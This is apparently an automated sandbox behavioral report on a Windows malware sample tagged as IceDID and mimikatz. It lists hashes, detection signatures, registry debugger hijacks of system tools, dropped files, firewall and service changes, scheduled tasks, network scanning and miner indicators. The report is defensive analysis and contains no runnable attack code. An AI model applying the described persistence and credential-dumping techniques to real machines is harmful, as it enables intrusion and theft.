Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
23/04/2024, 01:44
Behavioral task
behavioral1
Sample
2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe
Resource
win7-20240215-en
General
-
Target
2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe
-
Size
10.9MB
-
MD5
f756695fc343370a52043a477ebc7625
-
SHA1
0a26667f5ef714ac557a5010ca206423bce582ce
-
SHA256
0d13d1b72b663a06e717a98c3c09ba13657fbaeb4de2b64dc6d8e04ccacfb9e0
-
SHA512
0cba71a72cc5d2a3317b6e73d0ba968a0e2f4983c9e7b192d3b358afd33f9b97851e8e36fdc426fd9f35bb7bf4d2cd8b5b639b1858050cea0432b0f336fb263c
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4108 created 2220 4108 eluybcv.exe 39 -
Contacts a large (30385) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
resource yara_rule behavioral2/memory/4312-135-0x00007FF605CB0000-0x00007FF605D9E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore behavioral2/memory/4312-136-0x00007FF605CB0000-0x00007FF605D9E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 41 IoCs
resource yara_rule behavioral2/memory/3892-0-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX behavioral2/files/0x000a000000023401-5.dat UPX behavioral2/memory/3356-7-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX behavioral2/files/0x00070000000234a4-133.dat UPX behavioral2/memory/4312-135-0x00007FF605CB0000-0x00007FF605D9E000-memory.dmp UPX behavioral2/memory/4312-136-0x00007FF605CB0000-0x00007FF605D9E000-memory.dmp UPX behavioral2/files/0x00070000000234af-139.dat UPX behavioral2/memory/4552-140-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/4552-148-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/files/0x00070000000234ac-160.dat UPX behavioral2/memory/552-161-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/3764-170-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/4360-174-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/3992-178-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/552-181-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/896-182-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/896-184-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/1464-189-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/3456-193-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/3800-197-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/1628-201-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/552-203-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/4692-206-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/760-210-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/552-212-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/5004-215-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/3928-219-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/552-221-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/3356-224-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/3616-228-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/396-231-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/552-232-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/3132-233-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/3132-235-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/232-237-0x00007FF740970000-0x00007FF7409CB000-memory.dmp UPX behavioral2/memory/552-250-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/552-251-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/552-252-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/552-254-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/552-256-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX behavioral2/memory/552-257-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp UPX -
XMRig Miner payload 11 IoCs
resource yara_rule behavioral2/memory/552-181-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig behavioral2/memory/552-203-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig behavioral2/memory/552-212-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig behavioral2/memory/552-221-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig behavioral2/memory/552-232-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig behavioral2/memory/552-250-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig behavioral2/memory/552-251-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig behavioral2/memory/552-252-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig behavioral2/memory/552-254-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig behavioral2/memory/552-256-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig behavioral2/memory/552-257-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3892-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x000a000000023401-5.dat mimikatz behavioral2/memory/3356-7-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/4312-135-0x00007FF605CB0000-0x00007FF605D9E000-memory.dmp mimikatz behavioral2/memory/4312-136-0x00007FF605CB0000-0x00007FF605D9E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts eluybcv.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts eluybcv.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1096 netsh.exe 4384 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" eluybcv.exe -
Executes dropped EXE 29 IoCs
pid Process 3356 eluybcv.exe 4108 eluybcv.exe 4408 wpcap.exe 4668 giqnzllmh.exe 4312 vfshost.exe 4552 itmzphybw.exe 4516 xohudmc.exe 2240 ogmqci.exe 552 ytnkip.exe 3764 itmzphybw.exe 4360 itmzphybw.exe 3992 itmzphybw.exe 896 itmzphybw.exe 1464 itmzphybw.exe 3456 itmzphybw.exe 3800 itmzphybw.exe 1628 itmzphybw.exe 4692 itmzphybw.exe 760 itmzphybw.exe 5004 itmzphybw.exe 3928 itmzphybw.exe 3356 itmzphybw.exe 3616 itmzphybw.exe 396 itmzphybw.exe 3132 itmzphybw.exe 232 itmzphybw.exe 1244 eluybcv.exe 4772 egyqtzwap.exe 6800 eluybcv.exe -
Loads dropped DLL 12 IoCs
pid Process 4408 wpcap.exe 4408 wpcap.exe 4408 wpcap.exe 4408 wpcap.exe 4408 wpcap.exe 4408 wpcap.exe 4408 wpcap.exe 4408 wpcap.exe 4408 wpcap.exe 4668 giqnzllmh.exe 4668 giqnzllmh.exe 4668 giqnzllmh.exe -
resource yara_rule behavioral2/files/0x00070000000234a4-133.dat upx behavioral2/memory/4312-135-0x00007FF605CB0000-0x00007FF605D9E000-memory.dmp upx behavioral2/memory/4312-136-0x00007FF605CB0000-0x00007FF605D9E000-memory.dmp upx behavioral2/files/0x00070000000234af-139.dat upx behavioral2/memory/4552-140-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/4552-148-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/files/0x00070000000234ac-160.dat upx behavioral2/memory/552-161-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/3764-170-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/4360-174-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/3992-178-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/552-181-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/896-182-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/896-184-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/1464-189-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/3456-193-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/3800-197-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/1628-201-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/552-203-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/4692-206-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/760-210-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/552-212-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/5004-215-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/3928-219-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/552-221-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/3356-224-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/3616-228-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/396-231-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/552-232-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/3132-233-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/3132-235-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/232-237-0x00007FF740970000-0x00007FF7409CB000-memory.dmp upx behavioral2/memory/552-250-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/552-251-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/552-252-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/552-254-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/552-256-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx behavioral2/memory/552-257-0x00007FF64BB40000-0x00007FF64BC60000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 140 ifconfig.me 141 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 eluybcv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE eluybcv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft eluybcv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData eluybcv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 eluybcv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 eluybcv.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\ogmqci.exe xohudmc.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache eluybcv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 eluybcv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 eluybcv.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\ogmqci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies eluybcv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content eluybcv.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\kzgykqvgq\UnattendGC\specials\vimpcsvc.xml eluybcv.exe File created C:\Windows\rtibeyhl\spoolsrv.xml eluybcv.exe File created C:\Windows\kzgykqvgq\itzyefabz\egyqtzwap.exe eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\coli-0.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\crli-0.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\ucl.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\vimpcsvc.exe eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\docmicfg.xml eluybcv.exe File opened for modification C:\Windows\rtibeyhl\docmicfg.xml eluybcv.exe File created C:\Windows\kzgykqvgq\itzyefabz\wpcap.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\docmicfg.exe eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\schoedcl.exe eluybcv.exe File created C:\Windows\rtibeyhl\docmicfg.xml eluybcv.exe File created C:\Windows\rtibeyhl\eluybcv.exe 2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe File created C:\Windows\kzgykqvgq\UnattendGC\AppCapture64.dll eluybcv.exe File created C:\Windows\kzgykqvgq\itzyefabz\ip.txt eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\spoolsrv.exe eluybcv.exe File opened for modification C:\Windows\rtibeyhl\schoedcl.xml eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\trfo-2.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\tucl-1.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\schoedcl.xml eluybcv.exe File opened for modification C:\Windows\rtibeyhl\svschost.xml eluybcv.exe File opened for modification C:\Windows\rtibeyhl\spoolsrv.xml eluybcv.exe File opened for modification C:\Windows\kzgykqvgq\itzyefabz\Result.txt egyqtzwap.exe File created C:\Windows\kzgykqvgq\upbdrjv\swrpwe.exe eluybcv.exe File opened for modification C:\Windows\rtibeyhl\eluybcv.exe 2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\libxml2.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\svschost.xml eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\schoedcl.xml eluybcv.exe File created C:\Windows\rtibeyhl\svschost.xml eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\AppCapture32.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\trch-1.dll eluybcv.exe File created C:\Windows\kzgykqvgq\Corporate\mimidrv.sys eluybcv.exe File created C:\Windows\kzgykqvgq\Corporate\vfshost.exe eluybcv.exe File created C:\Windows\kzgykqvgq\itzyefabz\Packet.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\docmicfg.xml eluybcv.exe File created C:\Windows\rtibeyhl\schoedcl.xml eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\Shellcode.ini eluybcv.exe File created C:\Windows\kzgykqvgq\itzyefabz\wpcap.exe eluybcv.exe File created C:\Windows\kzgykqvgq\itzyefabz\giqnzllmh.exe eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\vimpcsvc.xml eluybcv.exe File created C:\Windows\rtibeyhl\vimpcsvc.xml eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\exma-1.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\svschost.xml eluybcv.exe File opened for modification C:\Windows\kzgykqvgq\Corporate\log.txt cmd.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\libeay32.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\spoolsrv.xml eluybcv.exe File created C:\Windows\kzgykqvgq\Corporate\mimilib.dll eluybcv.exe File created C:\Windows\kzgykqvgq\itzyefabz\scan.bat eluybcv.exe File opened for modification C:\Windows\kzgykqvgq\itzyefabz\Packet.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\xdvl-0.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\zlib1.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\svschost.exe eluybcv.exe File opened for modification C:\Windows\rtibeyhl\vimpcsvc.xml eluybcv.exe File created C:\Windows\ime\eluybcv.exe eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\tibe-2.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\spoolsrv.xml eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\cnli-1.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\posh-0.dll eluybcv.exe File created C:\Windows\kzgykqvgq\UnattendGC\specials\ssleay32.dll eluybcv.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4212 sc.exe 4584 sc.exe 2440 sc.exe 1752 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023401-5.dat nsis_installer_2 behavioral2/files/0x000700000002345c-14.dat nsis_installer_1 behavioral2/files/0x000700000002345c-14.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3156 schtasks.exe 4212 schtasks.exe 3880 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eluybcv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" eluybcv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ eluybcv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created 